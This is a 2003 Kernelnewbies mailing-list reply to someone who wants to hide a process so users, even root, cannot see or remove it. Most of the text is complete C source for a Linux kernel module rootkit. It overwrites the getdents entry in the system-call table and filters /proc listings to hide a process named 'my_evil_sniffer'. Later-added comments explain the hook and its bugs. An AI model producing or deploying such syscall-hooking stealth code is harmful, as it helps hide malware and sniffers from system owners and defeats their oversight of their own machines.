Re: Insert kernel module


 



Yes, you can definitely do it.


Compile the kernel module from the below source and test it.

Let me know what happened.

#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <sys/syscall.h>

#include <sys/types.h>
#include <asm/fcntl.h>
#include <asm/errno.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <sys/mman.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <linux/malloc.h>

#include <linux/proc_fs.h>

/*
 * Address of the kernel's system-call dispatch table. It is only declared
 * here; this file neither resolves nor validates it, so loading depends on
 * the running kernel exporting the symbol. Overwriting entries of this table
 * (see init_module()) is the classic hook that syscall-table integrity
 * checkers compare against.
 */
extern void* sys_call_table[];

/*process name we want to hide*/
/* Matched as a substring (strstr) against each task's escaped comm name in
 * invisible(); any process whose name contains it is dropped from /proc
 * directory listings. */
char mtroj[] = "my_evil_sniffer";

/* Saved pointer to the original getdents handler. Filled in by init_module(),
 * called first by hacked_getdents() so the real listing is produced before
 * any filtering, and written back into the table by cleanup_module(). */
int (*orig_getdents)(unsigned int fd, struct dirent *dirp, unsigned int
count);

/*
 * Parse a string of decimal digits into an int.
 *
 * Returns the parsed value, or -1 if any character is not an ASCII digit
 * (so a leading sign is rejected too). An empty string yields 0. No
 * overflow protection is applied for long digit strings.
 */
int myatoi(char *str)
{
 size_t len = strlen(str);
 int value = 0;
 size_t i;

 /* Scan front to back, accumulating most-significant digit first. */
 for (i = 0; i < len; i++) {
  unsigned char ch = (unsigned char) str[i];
  if (ch < '0' || ch > '9')
   return -1;
  value = value * 10 + (ch - '0');
 }
 return value;
}

/*get task structure from PID*/
/*
 * Walk the circular task list, starting from the calling task, until a task
 * whose pid matches is found. Returns that task_struct, or NULL once the walk
 * wraps back around to current without a match. The traversal follows the
 * next_task link directly and holds no lock while doing so.
 */
struct task_struct *get_task(pid_t pid)
{
 struct task_struct *p = current;
 do {
  if (p->pid == pid)
   return p;
   p = p->next_task;   /* runs on every iteration; the indentation is misleading */
  }
  while (p != current);
  return NULL;
}

/*get process name from task structure*/
/*
 * Copy p->comm into buf, escaping '\\' as "\\\\" and '\n' as "\\n", then
 * append a '\n'. Returns a pointer just past that trailing newline.
 *
 * Termination: the NUL that ends comm is written to *buf and then overwritten
 * by the trailing '\n', so the output is NOT NUL-terminated by this function.
 * invisible() relies on passing a zero-filled buffer so that strstr() stops at
 * the zeroed tail. Worst case every comm byte expands to two bytes, so buf
 * needs at least 2 * sizeof(p->comm) + 1 bytes.
 */
static inline char *task_name(struct task_struct *p, char *buf)
{
 int i;
 char *name;

 name = p->comm;
 i = sizeof(p->comm);   /* upper bound in case comm lacks a NUL */
 do {
  unsigned char c = *name;
  name++;
  i--;
  *buf = c;
  if (!c)
   break;   /* NUL was stored at *buf; the '\n' below overwrites it */
  if (c == '\\') {
   buf[1] = c;
   buf += 2;
   continue;
  }
  if (c == '\n') {
   buf[0] = '\\';
   buf[1] = 'n';
   buf += 2;
   continue;
  }
  buf++;
 }
 while (i);
 *buf = '\n';
 return buf + 1;
}

/*check whether we need to hide this process*/
/*
 * Return 1 if a task with this pid exists and its escaped comm name contains
 * mtroj, otherwise 0. A negative pid (what myatoi() returns for non-numeric
 * /proc entries such as "." or "self") is not expected to match any task and
 * so yields 0.
 *
 * The 200-byte kmalloc() result is used without a NULL check, and the buffer
 * is kfree()'d only on the match path; the non-match path returns with it
 * still allocated. The memset() is what terminates the string for strstr(),
 * because task_name() does not NUL-terminate its output.
 */
int invisible(pid_t pid)
{
 struct task_struct *task = get_task(pid);
 char *buffer;
 if (task) {
  buffer = kmalloc(200, GFP_KERNEL);
  memset(buffer, 0, 200);
  task_name(task, buffer);
  if (strstr(buffer, (char *) &mtroj)) {
   kfree(buffer);
   return 1;
  }
 }
 return 0;
}


/*
 * Replacement getdents handler installed over sys_call_table[SYS_getdents].
 * It first runs the original handler, then, only when fd refers to the /proc
 * root directory, rewrites the caller's dirent buffer to drop every entry
 * whose name is a pid for which invisible() returns 1, and returns the
 * shortened byte count.
 *
 * Mechanics: the whole result is copied into a kernel buffer (memcpy_fromfs),
 * filtered in place by memmove()-ing the remaining records over a hidden one,
 * and copied back with memcpy_tofs. A hidden entry that is last in the buffer
 * is given d_off = 1024 instead of being moved; in both cases tmp shrinks by
 * that record's length.
 *
 * The /proc test is by inode number (PROC_ROOT_INO) and device (major 0,
 * minor 1). fd is indexed straight into current->files->fd with no range or
 * NULL check, and the original handler's int result is stored in the
 * unsigned tmp, so a negative (error) return is not excluded by the
 * tmp > 0 test.
 */
int hacked_getdents(unsigned int fd, struct dirent *dirp, unsigned int
count)
{
 unsigned int tmp, n;
 int t, proc = 0;
 struct inode *dinode;
 struct dirent *dirp2, *dirp3;

 tmp = (*orig_getdents) (fd, dirp, count);   /* real listing first */

 /* file -> inode path depends on whether the dcache header is present */
#ifdef __LINUX_DCACHE_H
 dinode = current->files->fd[fd]->f_dentry->d_inode;
#else
 dinode = current->files->fd[fd]->f_inode;
#endif

 if (dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) &&
MINOR(dinode->i_dev) == 1)
  proc=1;   /* fd is the /proc root directory */
 if (tmp > 0) {
  dirp2 = (struct dirent *) kmalloc(tmp, GFP_KERNEL);   /* result not NULL-checked */
  memcpy_fromfs(dirp2, dirp, tmp);   /* pull the user buffer into kernel space */
  dirp3 = dirp2;
  t = tmp;   /* bytes still to scan */
  while (t > 0) {
   n = dirp3->d_reclen;
   t -= n;
  if ((proc && invisible(myatoi(dirp3->d_name)))) {
   if (t != 0)
    memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
   else
    dirp3->d_off = 1024;
    tmp -= n;   /* applies to both branches above despite the indentation */
   }
   if (t != 0)
    dirp3 = (struct dirent *) ((char *) dirp3 + dirp3->d_reclen);
  }
  memcpy_tofs(dirp, dirp2, tmp);   /* write the filtered listing back */
  kfree(dirp2);
 }
 return tmp;
}


/*
 * Module entry: remember the current getdents entry of sys_call_table and
 * replace it with hacked_getdents. No lock is taken and the entry is not
 * verified to hold the expected handler before it is overwritten. The
 * in-place table overwrite is the indicator that syscall-table integrity
 * monitors look for.
 */
int init_module(void)                /*module setup*/
{
 orig_getdents=sys_call_table[SYS_getdents];
 sys_call_table[SYS_getdents]=hacked_getdents;
 return 0;
}

/*
 * Module exit: put the saved original handler back into sys_call_table.
 * Nothing here waits for calls that may still be executing hacked_getdents;
 * NOTE(review): whether that is safe depends on the kernel's module-unload
 * handling — confirm for the target kernel.
 */
void cleanup_module(void)            /*module shutdown*/
{

sys_call_table[SYS_getdents]=orig_getdents;
}

iqbal






On Wed, 2003-01-15 at 10:17, Jonathan Khoo wrote: 
> Hi guys,
> 
> I need to hide a running process, a program which I have written so that 
> the end users cannot remove it.
> I read that LIDS does this. But it will be a tedious task if I have to 
> patch the kernel of all the boxes.
> Would it be possible to write a kernel module which hides the process, 
> and in turn hides its ownself as well??
> 
> Has anyone done this before?
> Thanks in advance.
> Soeren wrote:
> 
> >On Tue, 14 Jan 2003 11:58:53 -0800 (PST)
> >S P <sage_newbie@yahoo.com> wrote:
> >
> >  
> >
> >>Hi,
> >>
> >>I am writing a software program which when installed, inserts a kernel
> >>module. However the user should not be able to see the module (using
> >>lsmod) or remove it, even if he has root privileges. Only the uninstall
> >>program should be able to remove it. Is there any way this can be done ?
> >>I thought of modifying the sys_create_module system call.
> >>
> >>Thanks for the help,
> >>
> >>-SP
> >>    
> >>
> >
> >Hi,
> >you should take a look on:
> >http://packetstorm.decepticons.org/docs/hack/LKM_HACKING.html#II.9.
> >- maybe it'll help you.
> >
> >Soeren
> >
> >  
> >
> 
> 
> 
> --
> Kernelnewbies: Help each other learn about the Linux kernel.
> Archive:       http://mail.nl.linux.org/kernelnewbies/
> FAQ:           http://kernelnewbies.org/faq/
> 
> --
> Kernelnewbies: Help each other learn about the Linux kernel.
> Archive:       http://mail.nl.linux.org/kernelnewbies/
> FAQ:           http://kernelnewbies.org/faq/
> 
> 

--
Kernelnewbies: Help each other learn about the Linux kernel.
Archive:       http://mail.nl.linux.org/kernelnewbies/
FAQ:           http://kernelnewbies.org/faq/


